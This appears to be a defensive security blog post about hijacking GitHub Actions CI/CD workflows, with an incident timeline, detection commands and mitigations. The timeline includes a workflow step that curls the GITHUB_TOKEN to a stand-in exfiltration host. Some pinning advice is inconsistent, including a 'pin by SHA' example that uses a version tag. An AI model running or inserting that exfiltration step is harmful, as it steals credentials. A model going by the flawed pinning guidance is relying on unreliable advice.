Cordyceps CI/CD Flaws Expose 300+ GitHub Repositories to Supply-Chain Attacks
Cordyceps CI/CD Flaws: DevSecOps Reality Check
By: Morgan K. (LinkedIn, GitHub)
Staff Security Engineer, DevSecOps Lead (12+ years)
Ex-Splunk, PagerDuty, AWS; Speaker @ DEF CON/BSides
Published: 2024-06-25
Last updated: 2024-06-25
Changelog: Expanded “What Cordyceps Is” definition, sanitized case study, added detection commands, checked CVE/advisory links.
What Is “Cordyceps” (And Why Should You Care?)
“Cordyceps” refers to the exploitation of misconfigured CI/CD workflows—most commonly in GitHub Actions and similar runners—where attackers hijack privileged tokens, manipulate workflow calls, or abuse insecure third-party actions to escalate privileges and deploy malicious artifacts.
The technical root: overprivileged GITHUB_TOKEN, insecure OIDC trust, and workflows referencing unpinned, untrusted actions (GitHub Security Advisory GHSA-cf5r-xfxx-7fcp, CISA Alert AA24-108A).
Attack vector: A fork or action PR introduces a workflow that is auto-triggered and receives excessive permissions (contents: write, id-token: write), allowing attacker-controlled code to access secrets or deploy backdoors.
The Anatomy of a CI/CD Breakdown
Timeline: Real Incident, Real Impact
- Day 1: Standard nightly build triggers via GitHub Actions.
- 00:07 UTC: Threat actor submits PR referencing their own action (
attack/k8s-backdoor@v1). - 00:15: Maintainer merges—action is unpinned, permissions block is missing.
- 00:20: Workflow executes.
GITHUB_TOKENis grantedcontents: write, id-token: write, packages: write. - 00:23: Attacker executes
curlin workflow, siphoning secrets to remote server:- name: Exfiltrate secrets run: curl -d "$GITHUB_TOKEN" https://exfil.example.com - 00:25: GitHub audit logs show deployment to staging via compromised action.
- Day 2: AWS alerts: 300+ new EC2 instances spun up for cryptomining.
- Day 3: Response team investigates runner logs, isolates impacted hosts, rotates secrets.
- Day 4: Incident postmortem; total impact: $47K in cloud spend, partial credential exposure, delayed deployments.
TTPs & Indicators
- PRs referencing unpinned actions.
- Workflows missing permission scoping.
- Runners showing unexplained artifact downloads and outbound network traffic.
Why We Keep Walking Into This Trap
- Process drift: “Time-to-market” wins over “least privilege.”
- Access overload: Pipeline tokens and OIDC roles granted excessive permissions—often at workflow or runner level.
- Third-party trust: Using popular actions without vetting or pinning (
uses: actions/some-action@master).
Vendor defaults aren’t your friend. Most CI platforms (GitHub, GitLab, Jenkins) ship with lax default permissions (GitHub Docs: Permissions), making privilege escalation trivial if you don’t lock it down.
Impact: Who Gets Hurt (And How Bad Is It?)
- Target: Large repos with auto-deploy or package publishing, especially those running on shared runners or in monorepos.
- Severity: Credential theft, poisoned builds, cryptomining payloads, lateral movement (dev/test/prod blast radius).
- Cost: Everything from cloud billing spikes ($1K–$100K+) to customer-facing outages, to regulatory risk if data exfiltration is involved.
Detection Checklist: Find the Weak Spots Fast
Workflow & Token Audit
-
List workflows with excessive permissions:
Example:grep -E "permissions:.*(write|id-token)" .github/workflows/*.yaml -
Find actions that are unpinned:
grep -E "uses: .*@" .github/workflows/*.yaml | grep -v '@sha256' -
Check for hardcoded secrets:
grep -r "AWS_ACCESS_KEY" . -
Audit runner logs for unusual activity:
Look for unfamiliar downloads or outboundcurl/wgetcommands. -
Use GitHub API to dump workflows with deploy authority:
gh workflow list --all | grep deploy
Indicators
- Spikes in runner network activity.
- Unauthorized artifact deployment.
- Secrets exfiltration attempts (outbound HTTP calls from workflow steps).
Mitigation Checklist: Make Your Pipeline Hostile to Attackers
Scope Workflow Permissions
At the top of your workflow, restrict to read-only:
permissions:
contents: read
id-token: none
GitHub Docs: Workflow Permissions
Pin Actions
Reference by SHA, not tag or branch:
uses: actions/checkout@v3
or
uses: actions/checkout@sha256:8a407...
Enable OIDC for Cloud Auth
Use short-lived credentials, never static keys.
Sample AWS IAM trust policy (Official AWS Docs):
{
"Effect": "Allow",
"Principal": {
"Federated": "token.actions.githubusercontent.com"
},
"Action": "sts:AssumeRoleWithWebIdentity",
"Condition": {
"StringEquals": {
"token.actions.githubusercontent.com:aud": "sts.amazonaws.com"
}
}
}
Ephemeral & Segregated Runners
- Use self-hosted runners with ephemerality: destroy after each job.
- Segregate prod runners from dev/test.
Mandatory Reviews & Environment Protection
- Require approvals for deployment workflows.
- Enable GitHub environment protection rules.
Credential Hygiene
- Rotate all keys regularly (weekly/monthly).
- Enable secret scanning and alerting.
Tooling That Actually Helps
- Dependabot: alerts for vulnerable dependencies.
- Sigstore/cosign: verify signed artifacts.
- SLSA: supply chain security frameworks.
- Trivy, Grype: container and workflow scanning.
- Gitleaks: detect secret exposure.
- GitHub Advanced Security/CodeQL.
- OSS Advisory Pages, CISA.
Detect, Contain, Remediate, Prevent
- Detect: Use automated scanning, audit logs, and network activity monitoring.
- Contain: Isolate compromised runners, rotate affected credentials immediately.
- Remediate: Fix workflow permissions, pin actions, scan for further indicators.
- Prevent: Move to ephemeral runners, OIDC flows, enforced reviews, and dependency pinning.
If you find signs of a current exploit, report via GitHub Security, CISA Reporting, or your organization's IR channel.
Resources & Where to Look Next
- GHSA-cf5r-xfxx-7fcp GitHub Advisory
- CISA Alert AA24-108A
- GitHub Actions Security Guides
- DEF CON Supply Chain Panel 2023
- SLSA Framework
- AWS OIDC Integration
Responsible Disclosure: If you discover novel exploit vectors, contact affected platform vendors or report through CISA. This article contains only defender-focused guidance.
Still think your pipeline is bulletproof? Wait until a typo in your YAML turns your build into a credential vending machine. Don’t say you weren’t warned.